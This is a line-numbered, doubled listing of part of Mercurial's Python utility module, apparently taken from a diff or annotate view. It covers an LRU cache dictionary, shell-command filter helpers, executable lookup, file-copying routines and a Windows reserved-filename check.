677 The head node is the newest entry in the cache. If the cache is full,
681 we recycle head.prev and make it the new head. Cache accesses result in
678 we recycle head.prev and make it the new head. Cache accesses result in
682 the node being moved to before the existing head and being marked as the
679 the node being moved to before the existing head and being marked as the
683 new head node.
680 new head node.
684 """
681 """
685 def __init__(self, max):
682 def __init__(self, max):
686 self._cache = {}
683 self._cache = {}
687
684
688 self._head = head = _lrucachenode()
685 self._head = head = _lrucachenode()
689 head.prev = head
686 head.prev = head
690 head.next = head
687 head.next = head
691 self._size = 1
688 self._size = 1
692 self._capacity = max
689 self._capacity = max
693
690
694 def __len__(self):
691 def __len__(self):
695 return len(self._cache)
692 return len(self._cache)
696
693
697 def __contains__(self, k):
694 def __contains__(self, k):
698 return k in self._cache
695 return k in self._cache
699
696
700 def __iter__(self):
697 def __iter__(self):
701 # We don't have to iterate in cache order, but why not.
698 # We don't have to iterate in cache order, but why not.
702 n = self._head
699 n = self._head
703 for i in range(len(self._cache)):
700 for i in range(len(self._cache)):
704 yield n.key
701 yield n.key
705 n = n.next
702 n = n.next
706
703
707 def __getitem__(self, k):
704 def __getitem__(self, k):
708 node = self._cache[k]
705 node = self._cache[k]
709 self._movetohead(node)
706 self._movetohead(node)
710 return node.value
707 return node.value
711
708
712 def __setitem__(self, k, v):
709 def __setitem__(self, k, v):
713 node = self._cache.get(k)
710 node = self._cache.get(k)
714 # Replace existing value and mark as newest.
711 # Replace existing value and mark as newest.
715 if node is not None:
712 if node is not None:
716 node.value = v
713 node.value = v
717 self._movetohead(node)
714 self._movetohead(node)
718 return
715 return
719
716
720 if self._size < self._capacity:
717 if self._size < self._capacity:
721 node = self._addcapacity()
718 node = self._addcapacity()
722 else:
719 else:
723 # Grab the last/oldest item.
720 # Grab the last/oldest item.
724 node = self._head.prev
721 node = self._head.prev
725
722
726 # At capacity. Kill the old entry.
723 # At capacity. Kill the old entry.
727 if node.key is not _notset:
724 if node.key is not _notset:
728 del self._cache[node.key]
725 del self._cache[node.key]
729
726
730 node.key = k
727 node.key = k
731 node.value = v
728 node.value = v
732 self._cache[k] = node
729 self._cache[k] = node
733 # And mark it as newest entry. No need to adjust order since it
730 # And mark it as newest entry. No need to adjust order since it
734 # is already self._head.prev.
731 # is already self._head.prev.
735 self._head = node
732 self._head = node
736
733
737 def __delitem__(self, k):
734 def __delitem__(self, k):
738 node = self._cache.pop(k)
735 node = self._cache.pop(k)
739 node.markempty()
736 node.markempty()
740
737
741 # Temporarily mark as newest item before re-adjusting head to make
738 # Temporarily mark as newest item before re-adjusting head to make
742 # this node the oldest item.
739 # this node the oldest item.
743 self._movetohead(node)
740 self._movetohead(node)
744 self._head = node.next
741 self._head = node.next
745
742
746 # Additional dict methods.
743 # Additional dict methods.
747
744
748 def get(self, k, default=None):
745 def get(self, k, default=None):
749 try:
746 try:
750 return self._cache[k].value
747 return self._cache[k].value
751 except KeyError:
748 except KeyError:
752 return default
749 return default
753
750
754 def clear(self):
751 def clear(self):
755 n = self._head
752 n = self._head
756 while n.key is not _notset:
753 while n.key is not _notset:
757 n.markempty()
754 n.markempty()
758 n = n.next
755 n = n.next
759
756
760 self._cache.clear()
757 self._cache.clear()
761
758
762 def copy(self):
759 def copy(self):
763 result = lrucachedict(self._capacity)
760 result = lrucachedict(self._capacity)
764 n = self._head.prev
761 n = self._head.prev
765 # Iterate in oldest-to-newest order, so the copy has the right ordering
762 # Iterate in oldest-to-newest order, so the copy has the right ordering
766 for i in range(len(self._cache)):
763 for i in range(len(self._cache)):
767 result[n.key] = n.value
764 result[n.key] = n.value
768 n = n.prev
765 n = n.prev
769 return result
766 return result
770
767
771 def _movetohead(self, node):
768 def _movetohead(self, node):
772 """Mark a node as the newest, making it the new head.
769 """Mark a node as the newest, making it the new head.
773
770
774 When a node is accessed, it becomes the freshest entry in the LRU
771 When a node is accessed, it becomes the freshest entry in the LRU
775 list, which is denoted by self._head.
772 list, which is denoted by self._head.
776
773
777 Visually, let's make ``N`` the new head node (* denotes head):
774 Visually, let's make ``N`` the new head node (* denotes head):
778
775
779 previous/oldest <-> head <-> next/next newest
776 previous/oldest <-> head <-> next/next newest
780
777
781 ----<->--- A* ---<->-----
778 ----<->--- A* ---<->-----
782 | |
779 | |
783 E <-> D <-> N <-> C <-> B
780 E <-> D <-> N <-> C <-> B
784
781
785 To:
782 To:
786
783
787 ----<->--- N* ---<->-----
784 ----<->--- N* ---<->-----
788 | |
785 | |
789 E <-> D <-> C <-> B <-> A
786 E <-> D <-> C <-> B <-> A
790
787
791 This requires the following moves:
788 This requires the following moves:
792
789
793 C.next = D (node.prev.next = node.next)
790 C.next = D (node.prev.next = node.next)
794 D.prev = C (node.next.prev = node.prev)
791 D.prev = C (node.next.prev = node.prev)
795 E.next = N (head.prev.next = node)
792 E.next = N (head.prev.next = node)
796 N.prev = E (node.prev = head.prev)
793 N.prev = E (node.prev = head.prev)
797 N.next = A (node.next = head)
794 N.next = A (node.next = head)
798 A.prev = N (head.prev = node)
795 A.prev = N (head.prev = node)
799 """
796 """
800 head = self._head
797 head = self._head
801 # C.next = D
798 # C.next = D
802 node.prev.next = node.next
799 node.prev.next = node.next
803 # D.prev = C
800 # D.prev = C
804 node.next.prev = node.prev
801 node.next.prev = node.prev
805 # N.prev = E
802 # N.prev = E
806 node.prev = head.prev
803 node.prev = head.prev
807 # N.next = A
804 # N.next = A
808 # It is tempting to do just "head" here, however if node is
805 # It is tempting to do just "head" here, however if node is
809 # adjacent to head, this will do bad things.
806 # adjacent to head, this will do bad things.
810 node.next = head.prev.next
807 node.next = head.prev.next
811 # E.next = N
808 # E.next = N
812 node.next.prev = node
809 node.next.prev = node
813 # A.prev = N
810 # A.prev = N
814 node.prev.next = node
811 node.prev.next = node
815
812
816 self._head = node
813 self._head = node
817
814
818 def _addcapacity(self):
815 def _addcapacity(self):
819 """Add a node to the circular linked list.
816 """Add a node to the circular linked list.
820
817
821 The new node is inserted before the head node.
818 The new node is inserted before the head node.
822 """
819 """
823 head = self._head
820 head = self._head
824 node = _lrucachenode()
821 node = _lrucachenode()
825 head.prev.next = node
822 head.prev.next = node
826 node.prev = head.prev
823 node.prev = head.prev
827 node.next = head
824 node.next = head
828 head.prev = node
825 head.prev = node
829 self._size += 1
826 self._size += 1
830 return node
827 return node
831
828
832 def lrucachefunc(func):
829 def lrucachefunc(func):
833 '''cache most recent results of function calls'''
830 '''cache most recent results of function calls'''
834 cache = {}
831 cache = {}
835 order = collections.deque()
832 order = collections.deque()
836 if func.__code__.co_argcount == 1:
833 if func.__code__.co_argcount == 1:
837 def f(arg):
834 def f(arg):
838 if arg not in cache:
835 if arg not in cache:
839 if len(cache) > 20:
836 if len(cache) > 20:
840 del cache[order.popleft()]
837 del cache[order.popleft()]
841 cache[arg] = func(arg)
838 cache[arg] = func(arg)
842 else:
839 else:
843 order.remove(arg)
840 order.remove(arg)
844 order.append(arg)
841 order.append(arg)
845 return cache[arg]
842 return cache[arg]
846 else:
843 else:
847 def f(*args):
844 def f(*args):
848 if args not in cache:
845 if args not in cache:
849 if len(cache) > 20:
846 if len(cache) > 20:
850 del cache[order.popleft()]
847 del cache[order.popleft()]
851 cache[args] = func(*args)
848 cache[args] = func(*args)
852 else:
849 else:
853 order.remove(args)
850 order.remove(args)
854 order.append(args)
851 order.append(args)
855 return cache[args]
852 return cache[args]
856
853
857 return f
854 return f
858
855
859 class propertycache(object):
856 class propertycache(object):
860 def __init__(self, func):
857 def __init__(self, func):
861 self.func = func
858 self.func = func
862 self.name = func.__name__
859 self.name = func.__name__
863 def __get__(self, obj, type=None):
860 def __get__(self, obj, type=None):
864 result = self.func(obj)
861 result = self.func(obj)
865 self.cachevalue(obj, result)
862 self.cachevalue(obj, result)
866 return result
863 return result
867
864
868 def cachevalue(self, obj, value):
865 def cachevalue(self, obj, value):
869 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
866 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
870 obj.__dict__[self.name] = value
867 obj.__dict__[self.name] = value
871
868
872 def pipefilter(s, cmd):
869 def pipefilter(s, cmd):
873 '''filter string S through command CMD, returning its output'''
870 '''filter string S through command CMD, returning its output'''
874 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
871 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
875 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
872 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
876 pout, perr = p.communicate(s)
873 pout, perr = p.communicate(s)
877 return pout
874 return pout
878
875
879 def tempfilter(s, cmd):
876 def tempfilter(s, cmd):
880 '''filter string S through a pair of temporary files with CMD.
877 '''filter string S through a pair of temporary files with CMD.
881 CMD is used as a template to create the real command to be run,
878 CMD is used as a template to create the real command to be run,
882 with the strings INFILE and OUTFILE replaced by the real names of
879 with the strings INFILE and OUTFILE replaced by the real names of
883 the temporary files generated.'''
880 the temporary files generated.'''
884 inname, outname = None, None
881 inname, outname = None, None
885 try:
882 try:
886 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
883 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
887 fp = os.fdopen(infd, pycompat.sysstr('wb'))
884 fp = os.fdopen(infd, pycompat.sysstr('wb'))
888 fp.write(s)
885 fp.write(s)
889 fp.close()
886 fp.close()
890 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
887 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
891 os.close(outfd)
888 os.close(outfd)
892 cmd = cmd.replace('INFILE', inname)
889 cmd = cmd.replace('INFILE', inname)
893 cmd = cmd.replace('OUTFILE', outname)
890 cmd = cmd.replace('OUTFILE', outname)
894 code = os.system(cmd)
891 code = os.system(cmd)
895 if pycompat.sysplatform == 'OpenVMS' and code & 1:
892 if pycompat.sysplatform == 'OpenVMS' and code & 1:
896 code = 0
893 code = 0
897 if code:
894 if code:
898 raise Abort(_("command '%s' failed: %s") %
895 raise Abort(_("command '%s' failed: %s") %
899 (cmd, explainexit(code)))
896 (cmd, explainexit(code)))
900 return readfile(outname)
897 return readfile(outname)
901 finally:
898 finally:
902 try:
899 try:
903 if inname:
900 if inname:
904 os.unlink(inname)
901 os.unlink(inname)
905 except OSError:
902 except OSError:
906 pass
903 pass
907 try:
904 try:
908 if outname:
905 if outname:
909 os.unlink(outname)
906 os.unlink(outname)
910 except OSError:
907 except OSError:
911 pass
908 pass
912
909
913 filtertable = {
910 filtertable = {
914 'tempfile:': tempfilter,
911 'tempfile:': tempfilter,
915 'pipe:': pipefilter,
912 'pipe:': pipefilter,
916 }
913 }
917
914
918 def filter(s, cmd):
915 def filter(s, cmd):
919 "filter a string through a command that transforms its input to its output"
916 "filter a string through a command that transforms its input to its output"
920 for name, fn in filtertable.iteritems():
917 for name, fn in filtertable.iteritems():
921 if cmd.startswith(name):
918 if cmd.startswith(name):
922 return fn(s, cmd[len(name):].lstrip())
919 return fn(s, cmd[len(name):].lstrip())
923 return pipefilter(s, cmd)
920 return pipefilter(s, cmd)
924
921
925 def binary(s):
922 def binary(s):
926 """return true if a string is binary data"""
923 """return true if a string is binary data"""
927 return bool(s and '\0' in s)
924 return bool(s and '\0' in s)
928
925
929 def increasingchunks(source, min=1024, max=65536):
926 def increasingchunks(source, min=1024, max=65536):
930 '''return no less than min bytes per chunk while data remains,
927 '''return no less than min bytes per chunk while data remains,
931 doubling min after each chunk until it reaches max'''
928 doubling min after each chunk until it reaches max'''
932 def log2(x):
929 def log2(x):
933 if not x:
930 if not x:
934 return 0
931 return 0
935 i = 0
932 i = 0
936 while x:
933 while x:
937 x >>= 1
934 x >>= 1
938 i += 1
935 i += 1
939 return i - 1
936 return i - 1
940
937
941 buf = []
938 buf = []
942 blen = 0
939 blen = 0
943 for chunk in source:
940 for chunk in source:
944 buf.append(chunk)
941 buf.append(chunk)
945 blen += len(chunk)
942 blen += len(chunk)
946 if blen >= min:
943 if blen >= min:
947 if min < max:
944 if min < max:
948 min = min << 1
945 min = min << 1
949 nmin = 1 << log2(blen)
946 nmin = 1 << log2(blen)
950 if nmin > min:
947 if nmin > min:
951 min = nmin
948 min = nmin
952 if min > max:
949 if min > max:
953 min = max
950 min = max
954 yield ''.join(buf)
951 yield ''.join(buf)
955 blen = 0
952 blen = 0
956 buf = []
953 buf = []
957 if buf:
954 if buf:
958 yield ''.join(buf)
955 yield ''.join(buf)
959
956
960 Abort = error.Abort
957 Abort = error.Abort
961
958
962 def always(fn):
959 def always(fn):
963 return True
960 return True
964
961
965 def never(fn):
962 def never(fn):
966 return False
963 return False
967
964
968 def nogc(func):
965 def nogc(func):
969 """disable garbage collector
966 """disable garbage collector
970
967
971 Python's garbage collector triggers a GC each time a certain number of
968 Python's garbage collector triggers a GC each time a certain number of
972 container objects (the number being defined by gc.get_threshold()) are
969 container objects (the number being defined by gc.get_threshold()) are
973 allocated even when marked not to be tracked by the collector. Tracking has
970 allocated even when marked not to be tracked by the collector. Tracking has
974 no effect on when GCs are triggered, only on what objects the GC looks
971 no effect on when GCs are triggered, only on what objects the GC looks
975 into. As a workaround, disable GC while building complex (huge)
972 into. As a workaround, disable GC while building complex (huge)
976 containers.
973 containers.
977
974
978 This garbage collector issue have been fixed in 2.7. But it still affect
975 This garbage collector issue have been fixed in 2.7. But it still affect
979 CPython's performance.
976 CPython's performance.
980 """
977 """
981 def wrapper(*args, **kwargs):
978 def wrapper(*args, **kwargs):
982 gcenabled = gc.isenabled()
979 gcenabled = gc.isenabled()
983 gc.disable()
980 gc.disable()
984 try:
981 try:
985 return func(*args, **kwargs)
982 return func(*args, **kwargs)
986 finally:
983 finally:
987 if gcenabled:
984 if gcenabled:
988 gc.enable()
985 gc.enable()
989 return wrapper
986 return wrapper
990
987
991 if pycompat.ispypy:
988 if pycompat.ispypy:
992 # PyPy runs slower with gc disabled
989 # PyPy runs slower with gc disabled
993 nogc = lambda x: x
990 nogc = lambda x: x
994
991
995 def pathto(root, n1, n2):
992 def pathto(root, n1, n2):
996 '''return the relative path from one place to another.
993 '''return the relative path from one place to another.
997 root should use os.sep to separate directories
994 root should use os.sep to separate directories
998 n1 should use os.sep to separate directories
995 n1 should use os.sep to separate directories
999 n2 should use "/" to separate directories
996 n2 should use "/" to separate directories
1000 returns an os.sep-separated path.
997 returns an os.sep-separated path.
1001
998
1002 If n1 is a relative path, it's assumed it's
999 If n1 is a relative path, it's assumed it's
1003 relative to root.
1000 relative to root.
1004 n2 should always be relative to root.
1001 n2 should always be relative to root.
1005 '''
1002 '''
1006 if not n1:
1003 if not n1:
1007 return localpath(n2)
1004 return localpath(n2)
1008 if os.path.isabs(n1):
1005 if os.path.isabs(n1):
1009 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1006 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1010 return os.path.join(root, localpath(n2))
1007 return os.path.join(root, localpath(n2))
1011 n2 = '/'.join((pconvert(root), n2))
1008 n2 = '/'.join((pconvert(root), n2))
1012 a, b = splitpath(n1), n2.split('/')
1009 a, b = splitpath(n1), n2.split('/')
1013 a.reverse()
1010 a.reverse()
1014 b.reverse()
1011 b.reverse()
1015 while a and b and a[-1] == b[-1]:
1012 while a and b and a[-1] == b[-1]:
1016 a.pop()
1013 a.pop()
1017 b.pop()
1014 b.pop()
1018 b.reverse()
1015 b.reverse()
1019 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1016 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1020
1017
1021 def mainfrozen():
1018 def mainfrozen():
1022 """return True if we are a frozen executable.
1019 """return True if we are a frozen executable.
1023
1020
1024 The code supports py2exe (most common, Windows only) and tools/freeze
1021 The code supports py2exe (most common, Windows only) and tools/freeze
1025 (portable, not much used).
1022 (portable, not much used).
1026 """
1023 """
1027 return (safehasattr(sys, "frozen") or # new py2exe
1024 return (safehasattr(sys, "frozen") or # new py2exe
1028 safehasattr(sys, "importers") or # old py2exe
1025 safehasattr(sys, "importers") or # old py2exe
1029 imp.is_frozen(u"__main__")) # tools/freeze
1026 imp.is_frozen(u"__main__")) # tools/freeze
1030
1027
1031 # the location of data files matching the source code
1028 # the location of data files matching the source code
1032 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1029 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1033 # executable version (py2exe) doesn't support __file__
1030 # executable version (py2exe) doesn't support __file__
1034 datapath = os.path.dirname(pycompat.sysexecutable)
1031 datapath = os.path.dirname(pycompat.sysexecutable)
1035 else:
1032 else:
1036 datapath = os.path.dirname(pycompat.fsencode(__file__))
1033 datapath = os.path.dirname(pycompat.fsencode(__file__))
1037
1034
1038 i18n.setdatapath(datapath)
1035 i18n.setdatapath(datapath)
1039
1036
1040 _hgexecutable = None
1037 _hgexecutable = None
1041
1038
1042 def hgexecutable():
1039 def hgexecutable():
1043 """return location of the 'hg' executable.
1040 """return location of the 'hg' executable.
1044
1041
1045 Defaults to $HG or 'hg' in the search path.
1042 Defaults to $HG or 'hg' in the search path.
1046 """
1043 """
1047 if _hgexecutable is None:
1044 if _hgexecutable is None:
1048 hg = encoding.environ.get('HG')
1045 hg = encoding.environ.get('HG')
1049 mainmod = sys.modules[pycompat.sysstr('__main__')]
1046 mainmod = sys.modules[pycompat.sysstr('__main__')]
1050 if hg:
1047 if hg:
1051 _sethgexecutable(hg)
1048 _sethgexecutable(hg)
1052 elif mainfrozen():
1049 elif mainfrozen():
1053 if getattr(sys, 'frozen', None) == 'macosx_app':
1050 if getattr(sys, 'frozen', None) == 'macosx_app':
1054 # Env variable set by py2app
1051 # Env variable set by py2app
1055 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1052 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1056 else:
1053 else:
1057 _sethgexecutable(pycompat.sysexecutable)
1054 _sethgexecutable(pycompat.sysexecutable)
1058 elif (os.path.basename(
1055 elif (os.path.basename(
1059 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1056 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1060 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1057 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1061 else:
1058 else:
1062 exe = findexe('hg') or os.path.basename(sys.argv[0])
1059 exe = findexe('hg') or os.path.basename(sys.argv[0])
1063 _sethgexecutable(exe)
1060 _sethgexecutable(exe)
1064 return _hgexecutable
1061 return _hgexecutable
1065
1062
1066 def _sethgexecutable(path):
1063 def _sethgexecutable(path):
1067 """set location of the 'hg' executable"""
1064 """set location of the 'hg' executable"""
1068 global _hgexecutable
1065 global _hgexecutable
1069 _hgexecutable = path
1066 _hgexecutable = path
1070
1067
1071 def _isstdout(f):
1068 def _isstdout(f):
1072 fileno = getattr(f, 'fileno', None)
1069 fileno = getattr(f, 'fileno', None)
1073 return fileno and fileno() == sys.__stdout__.fileno()
1070 return fileno and fileno() == sys.__stdout__.fileno()
1074
1071
1075 def shellenviron(environ=None):
1072 def shellenviron(environ=None):
1076 """return environ with optional override, useful for shelling out"""
1073 """return environ with optional override, useful for shelling out"""
1077 def py2shell(val):
1074 def py2shell(val):
1078 'convert python object into string that is useful to shell'
1075 'convert python object into string that is useful to shell'
1079 if val is None or val is False:
1076 if val is None or val is False:
1080 return '0'
1077 return '0'
1081 if val is True:
1078 if val is True:
1082 return '1'
1079 return '1'
1083 return str(val)
1080 return str(val)
1084 env = dict(encoding.environ)
1081 env = dict(encoding.environ)
1085 if environ:
1082 if environ:
1086 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1083 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1087 env['HG'] = hgexecutable()
1084 env['HG'] = hgexecutable()
1088 return env
1085 return env
1089
1086
1090 def system(cmd, environ=None, cwd=None, out=None):
1087 def system(cmd, environ=None, cwd=None, out=None):
1091 '''enhanced shell command execution.
1088 '''enhanced shell command execution.
1092 run with environment maybe modified, maybe in different dir.
1089 run with environment maybe modified, maybe in different dir.
1093
1090
1094 if out is specified, it is assumed to be a file-like object that has a
1091 if out is specified, it is assumed to be a file-like object that has a
1095 write() method. stdout and stderr will be redirected to out.'''
1092 write() method. stdout and stderr will be redirected to out.'''
1096 try:
1093 try:
1097 stdout.flush()
1094 stdout.flush()
1098 except Exception:
1095 except Exception:
1099 pass
1096 pass
1100 cmd = quotecommand(cmd)
1097 cmd = quotecommand(cmd)
1101 env = shellenviron(environ)
1098 env = shellenviron(environ)
1102 if out is None or _isstdout(out):
1099 if out is None or _isstdout(out):
1103 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1100 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1104 env=env, cwd=cwd)
1101 env=env, cwd=cwd)
1105 else:
1102 else:
1106 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1103 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1107 env=env, cwd=cwd, stdout=subprocess.PIPE,
1104 env=env, cwd=cwd, stdout=subprocess.PIPE,
1108 stderr=subprocess.STDOUT)
1105 stderr=subprocess.STDOUT)
1109 for line in iter(proc.stdout.readline, ''):
1106 for line in iter(proc.stdout.readline, ''):
1110 out.write(line)
1107 out.write(line)
1111 proc.wait()
1108 proc.wait()
1112 rc = proc.returncode
1109 rc = proc.returncode
1113 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1110 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1114 rc = 0
1111 rc = 0
1115 return rc
1112 return rc
1116
1113
1117 def checksignature(func):
1114 def checksignature(func):
1118 '''wrap a function with code to check for calling errors'''
1115 '''wrap a function with code to check for calling errors'''
1119 def check(*args, **kwargs):
1116 def check(*args, **kwargs):
1120 try:
1117 try:
1121 return func(*args, **kwargs)
1118 return func(*args, **kwargs)
1122 except TypeError:
1119 except TypeError:
1123 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1120 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1124 raise error.SignatureError
1121 raise error.SignatureError
1125 raise
1122 raise
1126
1123
1127 return check
1124 return check
1128
1125
1129 # a whilelist of known filesystems where hardlink works reliably
1126 # a whilelist of known filesystems where hardlink works reliably
1130 _hardlinkfswhitelist = {
1127 _hardlinkfswhitelist = {
1131 'btrfs',
1128 'btrfs',
1132 'ext2',
1129 'ext2',
1133 'ext3',
1130 'ext3',
1134 'ext4',
1131 'ext4',
1135 'hfs',
1132 'hfs',
1136 'jfs',
1133 'jfs',
1137 'reiserfs',
1134 'reiserfs',
1138 'tmpfs',
1135 'tmpfs',
1139 'ufs',
1136 'ufs',
1140 'xfs',
1137 'xfs',
1141 'zfs',
1138 'zfs',
1142 }
1139 }
1143
1140
1144 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1141 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1145 '''copy a file, preserving mode and optionally other stat info like
1142 '''copy a file, preserving mode and optionally other stat info like
1146 atime/mtime
1143 atime/mtime
1147
1144
1148 checkambig argument is used with filestat, and is useful only if
1145 checkambig argument is used with filestat, and is useful only if
1149 destination file is guarded by any lock (e.g. repo.lock or
1146 destination file is guarded by any lock (e.g. repo.lock or
1150 repo.wlock).
1147 repo.wlock).
1151
1148
1152 copystat and checkambig should be exclusive.
1149 copystat and checkambig should be exclusive.
1153 '''
1150 '''
1154 assert not (copystat and checkambig)
1151 assert not (copystat and checkambig)
1155 oldstat = None
1152 oldstat = None
1156 if os.path.lexists(dest):
1153 if os.path.lexists(dest):
1157 if checkambig:
1154 if checkambig:
1158 oldstat = checkambig and filestat.frompath(dest)
1155 oldstat = checkambig and filestat.frompath(dest)
1159 unlink(dest)
1156 unlink(dest)
1160 if hardlink:
1157 if hardlink:
1161 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1158 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1162 # unless we are confident that dest is on a whitelisted filesystem.
1159 # unless we are confident that dest is on a whitelisted filesystem.
1163 try:
1160 try:
1164 fstype = getfstype(os.path.dirname(dest))
1161 fstype = getfstype(os.path.dirname(dest))
1165 except OSError:
1162 except OSError:
1166 fstype = None
1163 fstype = None
1167 if fstype not in _hardlinkfswhitelist:
1164 if fstype not in _hardlinkfswhitelist:
1168 hardlink = False
1165 hardlink = False
1169 if hardlink:
1166 if hardlink:
1170 try:
1167 try:
1171 oslink(src, dest)
1168 oslink(src, dest)
1172 return
1169 return
1173 except (IOError, OSError):
1170 except (IOError, OSError):
1174 pass # fall back to normal copy
1171 pass # fall back to normal copy
1175 if os.path.islink(src):
1172 if os.path.islink(src):
1176 os.symlink(os.readlink(src), dest)
1173 os.symlink(os.readlink(src), dest)
1177 # copytime is ignored for symlinks, but in general copytime isn't needed
1174 # copytime is ignored for symlinks, but in general copytime isn't needed
1178 # for them anyway
1175 # for them anyway
1179 else:
1176 else:
1180 try:
1177 try:
1181 shutil.copyfile(src, dest)
1178 shutil.copyfile(src, dest)
1182 if copystat:
1179 if copystat:
1183 # copystat also copies mode
1180 # copystat also copies mode
1184 shutil.copystat(src, dest)
1181 shutil.copystat(src, dest)
1185 else:
1182 else:
1186 shutil.copymode(src, dest)
1183 shutil.copymode(src, dest)
1187 if oldstat and oldstat.stat:
1184 if oldstat and oldstat.stat:
1188 newstat = filestat.frompath(dest)
1185 newstat = filestat.frompath(dest)
1189 if newstat.isambig(oldstat):
1186 if newstat.isambig(oldstat):
1190 # stat of copied file is ambiguous to original one
1187 # stat of copied file is ambiguous to original one
1191 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1188 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1192 os.utime(dest, (advanced, advanced))
1189 os.utime(dest, (advanced, advanced))
1193 except shutil.Error as inst:
1190 except shutil.Error as inst:
1194 raise Abort(str(inst))
1191 raise Abort(str(inst))
1195
1192
1196 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1193 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1197 """Copy a directory tree using hardlinks if possible."""
1194 """Copy a directory tree using hardlinks if possible."""
1198 num = 0
1195 num = 0
1199
1196
1200 gettopic = lambda: hardlink and _('linking') or _('copying')
1197 gettopic = lambda: hardlink and _('linking') or _('copying')
1201
1198
1202 if os.path.isdir(src):
1199 if os.path.isdir(src):
1203 if hardlink is None:
1200 if hardlink is None:
1204 hardlink = (os.stat(src).st_dev ==
1201 hardlink = (os.stat(src).st_dev ==
1205 os.stat(os.path.dirname(dst)).st_dev)
1202 os.stat(os.path.dirname(dst)).st_dev)
1206 topic = gettopic()
1203 topic = gettopic()
1207 os.mkdir(dst)
1204 os.mkdir(dst)
1208 for name, kind in listdir(src):
1205 for name, kind in listdir(src):
1209 srcname = os.path.join(src, name)
1206 srcname = os.path.join(src, name)
1210 dstname = os.path.join(dst, name)
1207 dstname = os.path.join(dst, name)
1211 def nprog(t, pos):
1208 def nprog(t, pos):
1212 if pos is not None:
1209 if pos is not None:
1213 return progress(t, pos + num)
1210 return progress(t, pos + num)
1214 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1211 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1215 num += n
1212 num += n
1216 else:
1213 else:
1217 if hardlink is None:
1214 if hardlink is None:
1218 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1215 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1219 os.stat(os.path.dirname(dst)).st_dev)
1216 os.stat(os.path.dirname(dst)).st_dev)
1220 topic = gettopic()
1217 topic = gettopic()
1221
1218
1222 if hardlink:
1219 if hardlink:
1223 try:
1220 try:
1224 oslink(src, dst)
1221 oslink(src, dst)
1225 except (IOError, OSError):
1222 except (IOError, OSError):
1226 hardlink = False
1223 hardlink = False
1227 shutil.copy(src, dst)
1224 shutil.copy(src, dst)
1228 else:
1225 else:
1229 shutil.copy(src, dst)
1226 shutil.copy(src, dst)
1230 num += 1
1227 num += 1
1231 progress(topic, num)
1228 progress(topic, num)
1232 progress(topic, None)
1229 progress(topic, None)
1233
1230
1234 return hardlink, num
1231 return hardlink, num
1235
1232
1236 _winreservednames = b'''con prn aux nul
1233 _winreservednames = b'''con prn aux nul
1237 com1 com2 com3 com4 com5 com6 com7 com8 com9
1234 com1 com2 com3 com4 com5 com6 com7 com8 com9
1238 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1235 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1239 _winreservedchars = ':*?"<>|'
1236 _winreservedchars = ':*?"<>|'
1240 def checkwinfilename(path):
1237 def checkwinfilename(path):
1241 r'''Check that the base-relative path is a valid filename on Windows.
1238 r'''Check that the base-relative path is a valid filename on Windows.
1242 Returns None if the path is ok, or a UI string describing the problem.
1239 Returns None if the path is ok, or a UI string describing the problem.
1243
1240
1244 >>> checkwinfilename("just/a/normal/path")
1241 >>> checkwinfilename("just/a/normal/path")
1245 >>> checkwinfilename("foo/bar/con.xml")
1242 >>> checkwinfilename("foo/bar/con.xml")
1246 "filename contains 'con', which is reserved on Windows"
1243 "filename contains 'con', which is reserved on Windows"
1247 >>> checkwinfilename("foo/con.xml/bar")
1244 >>> checkwinfilename("foo/con.xml/bar")
1248 "filename contains 'con', which is reserved on Windows"
1245 "filename contains 'con', which is reserved on Windows"
1249 >>> checkwinfilename("foo/bar/xml.con")
1246 >>> checkwinfilename("foo/bar/xml.con")
1250 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1247 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1251 "filename contains 'AUX', which is reserved on Windows"
1248 "filename contains 'AUX', which is reserved on Windows"
